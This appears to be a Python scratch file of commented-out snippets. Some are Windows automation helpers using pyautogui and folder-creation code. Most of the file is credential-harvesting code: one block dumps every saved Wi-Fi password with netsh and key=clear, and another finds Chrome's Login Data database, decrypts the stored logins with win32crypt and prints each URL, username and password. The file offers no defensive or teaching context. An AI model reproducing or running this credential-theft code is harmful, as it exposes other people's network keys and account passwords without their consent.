#subprocess.Popen('explorer ".\\V"')



'''
def ADD_ImpFold():
    LoF_Fol= '.\\F\\' + Device_Name + '\\List of Files\\'
    if not os.path.exists(LoF_Fol):
        os.mkdir(LoF_Fol)

    CopFil_Fol= '.\\F\\' + Device_Name + '\\Copied Files'    
    if not os.path.exists(CopFil_Fol):
        os.mkdir(CopFil_Fol)
ADD_ImpFold()
'''

'''
def devmgmt():
    import pyautogui
    pyautogui.hotkey('win', 'r')
    pyautogui.typewrite('devmgmt.msc')
    pyautogui.press('enter')
    wait(5.0)
    pyautogui.hotkey('win', 'up')
'''
'''
def unin():
    pyautogui.hotkey('win', 'r')
    pyautogui.typewrite('control')
    pyautogui.press('enter')
    wait(1)
    pyautogui.hotkey('win','up')
    sx,sy=pyautogui.size()
    pyautogui.click(sx/20.2,sy/1.05)
    pyautogui.typewrite('unin')
    wait(0.25)
    pyautogui.click(sx/7.8,sy/7.83)
'''

#WF psss
'''import subprocess

a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
#print(a)
a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
#print(a)
for i in a:
    results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
    results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
    try:
        print ("{:<30}|  {:<}".format(i, results[0]))
    except IndexError:
        print ("{:<30}|  {:<}".format(i, ""))
'''

# CHROME PASSWORDS (LONG TIME <1.25>)
"""
time=rx7.record()
import os,sqlite3,win32crypt,sys
try:
    path = sys.argv[1]
except IndexError:
    for w in os.walk(os.getenv('USERPROFILE')):
        if 'Chrome' in w[1]:
            path = str(w[0]) + '\\Chrome\\User Data\\Default\\Login Data'

# <Connect to the Database>
try:
    #print('[+] Opening ' + path)
    conn = sqlite3.connect(path)
    cursor = conn.cursor()
except Exception as e:
    print('[-] %s' % (e))
    sys.exit(1)

# <Get the results>
try:
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except Exception as e:
    print('[-] %s' % (e))
    sys.exit(1)

data = cursor.fetchall()

password =False
x,y=[],[]
if len(data) > 0:
    for result in data:
        # <Decrypt the Password>
        try:
            password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
            #print('''[+] URL: %s\n    Username: %s\n    Password: %s''' %(result[0], result[1], password))
        except Exception as e:
            print('[-] %s' % (e))
            y.append(1)
        if password:
            print('''[+] URL: %s\n    Username: %s\n    Password: %s''' %(result[0], result[1], password))
            x.append(1)
else:
    print('[-] No results returned from query')
    sys.exit(0)
print(len(x))
print(len(y))
print(time.stop())
"""